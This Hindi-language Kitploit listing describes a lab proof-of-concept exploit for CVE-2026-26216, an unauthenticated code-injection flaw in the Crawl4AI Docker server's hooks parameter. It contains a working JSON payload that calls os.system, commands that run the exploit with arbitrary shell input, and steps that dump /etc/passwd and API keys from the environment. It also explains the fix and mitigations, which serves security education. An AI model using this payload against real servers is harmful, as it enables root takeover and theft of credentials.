Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EXPLOIT-CVE-2026-26216 — CVE-2026-26216 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Crawl4AI के Docker परिनियोजन में हुक इंजेक्शन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें कमजोर लैब वातावरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/joaovicdev/exploit-cve-2026-26216
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubjoaovicdev/exploit-cve-2026-26216

EXPLOIT-CVE-2026-26216

CVE-2026-26216 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Crawl4AI के Docker परिनियोजन में हुक इंजेक्शन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें कमजोर लैब वातावरण शामिल है।

रिपॉजिटरी देखें
41 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-26216 — hooks के माध्यम से Crawl4AI अनऑथेंटिकेटेड RCE (GHSA-5882-5rx9-xgxp)

CVSS 10.0 · pre-auth RCE · CWE-94 (Code Injection) Crawl4AI (< 0.8.0) के Docker सर्वर पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन, POST /crawl एंडपॉइंट के hooks पैरामीटर का दुरुपयोग करते हुए। POST में एक एकल JSON कंटेनर के अंदर Python को रूट के रूप में निष्पादित करता है।

यह एक प्रयोगशाला PoC है, जो स्व-निहित और पुनरुत्पादनीय है, सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।


एक वाक्य में भेद्यता

POST /crawl एंडपॉइंट hooks.code.<evento> फ़ील्ड में मनमाना Python कोड स्वीकार करता है। यह कोड एक "घरेलू सैंडबॉक्स" — प्रतिबंधित builtins का शब्दकोश — के अंदर exec() के साथ निष्पादित होता है। लेकिन , जो की अनुमति देता है और पूरे सैंडबॉक्स को विफल कर देता है।

__import__ को allowlist में छोड़ दिया गया था
__import__('os').system(...)
root@kitploit:~
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created":
        "async def hook(page, context, **kwargs):\n    __import__('os').system('id')\n    return page"
    }
  }
}

चूंकि आधिकारिक डिप्लॉयमेंट डिफ़ॉल्ट रूप से JWT बंद करके चलता है और कंटेनर रूट के रूप में चलता है, इसलिए परिणाम प्री-ऑथेंटिकेशन रूट RCE है।

यह "AI टूल में घरेलू सैंडबॉक्स" के बारे में सही सबक क्यों है

सैंडबॉक्स काम करता हुआ प्रतीत होता है: open, eval, exec हटा दिए गए हैं, इसलिए एक भोला हमला (open('/etc/passwd')) अवरुद्ध हो जाता है। यह सुरक्षा की झूठी भावना पैदा करता है। लेकिन पूरी stdlib (os, subprocess, socket) को आयात करने के लिए केवल एक भूला हुआ खतरनाक builtin (__import__) पर्याप्त है, और allowlist सजावट बन जाती है। Builtins की allowlist एक सैंडबॉक्स नहीं है।


प्रोजेक्ट संरचना

root@kitploit:~
CVE-2026-26216/
├── README.md
├── docker-compose.yml         # sobe o servidor vulnerável
├── vulnerable-app/
│   ├── Dockerfile             # imagem que roda como root (igual à oficial)
│   ├── requirements.txt
│   ├── server.py              # FastAPI: POST /crawl sem auth
│   └── hook_manager.py        # o sandbox fraco (a linha vulnerável está aqui)
└── exploit/
    └── exploit.py             # exploit Python (só stdlib)

निष्ठा नोट। vulnerable-app/ Crawl4AI के भेद्य कोड पथ का एक संक्षिप्त पुनरुत्पादन है (Chromium/Playwright नहीं खोलता), ताकि PoC हल्का और 100% पुनरुत्पादनीय रहे। सैंडबॉक्स का व्यवहार और पेलोड की संरचना आधिकारिक advisory GHSA-5882-5rx9-xgxp को प्रतिबिंबित करती है। भेद्य पंक्ति vulnerable-app/hook_manager.py में चिह्नित है।


चलाने का तरीका

root@kitploit:~
# 1. sobe o alvo
docker compose up -d --build

# 2. demonstração completa
python3 exploit/exploit.py --target http://localhost:11235 --demo

# 3. comando arbitrário
python3 exploit/exploit.py --target http://localhost:11235 --cmd "id; hostname; env"

# 4. derruba
docker compose down -v

एक्सप्लॉइट क्या प्रदर्शित करता है

#क्रियाप्रभाव
1open('/etc/passwd') सीधासैंडबॉक्स द्वारा अवरुद्ध (झूठी सुरक्षा)
2__import__('subprocess') + id/whoamiरूट के रूप में RCE
3शेल के माध्यम से cat /etc/passwdफ़ाइलों का मनमाना पठन
4env | grep KEYAPI keys / टोकन की एक्सफ़िलट्रेशन
5echo ... > /tmp/PWNEDफ़ाइलों का मनमाना लेखन

वहाँ से: आंतरिक नेटवर्क में पिवोट, क्लाउड क्रेडेंशियल्स की चोरी, पर्सिस्टेंस, आदि।


प्रभाव

  • गोपनीयता: OPENAI_API_KEY, आंतरिक टोकन और कंटेनर secrets की चोरी।
  • अखंडता: फ़ाइलों का लेखन/संशोधन, बैकडोर।
  • उपलब्धता: प्रक्रियाओं को kill करना, डेटा मिटाना।
  • पार्श्व (Lateral): कंटेनर के पास आमतौर पर आंतरिक नेटवर्क तक पहुंच होती है → पिवोट।

यह सब बिना प्रमाणीकरण के।


सुधार

Crawl4AI 0.8.0 में ठीक किया गया:

  • __import__ (और eval/exec/open) अनुमत builtins से हटाए गए।
  • Hooks डिफ़ॉल्ट रूप से अक्षम — CRAWL4AI_HOOKS_ENABLED=true के माध्यम से स्पष्ट opt-in।

सामान्य शमन उपाय:

  • crawl4ai >= 0.8.0 में अपडेट करें।
  • Crawl4AI सर्वर को कभी भी सीधे इंटरनेट पर एक्सपोज़ न करें; JWT सक्षम करें।
  • कंटेनर को रूट के रूप में न चलाएं; गैर-विशेषाधिकार प्राप्त उपयोगकर्ता और read-only FS का उपयोग करें।
  • "Builtins की allowlist" को वही मानें जो वह है: यह एक सैंडबॉक्स नहीं है। अविश्वसनीय कोड निष्पादित करने के लिए, वास्तविक अलगाव (gVisor, microVM, नेटवर्क/FS के बिना अलग प्रक्रिया, seccomp) का उपयोग करें।

संदर्भ

  • GitHub Advisory — GHSA-5882-5rx9-xgxp
  • GitHub Advisory Database
  • Corgea — CVE-2026-26216
  • GitLab Advisory Database
  • miggo.io — GHSA-5882-5rx9-xgxp

कानूनी अस्वीकरण

सामग्री अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें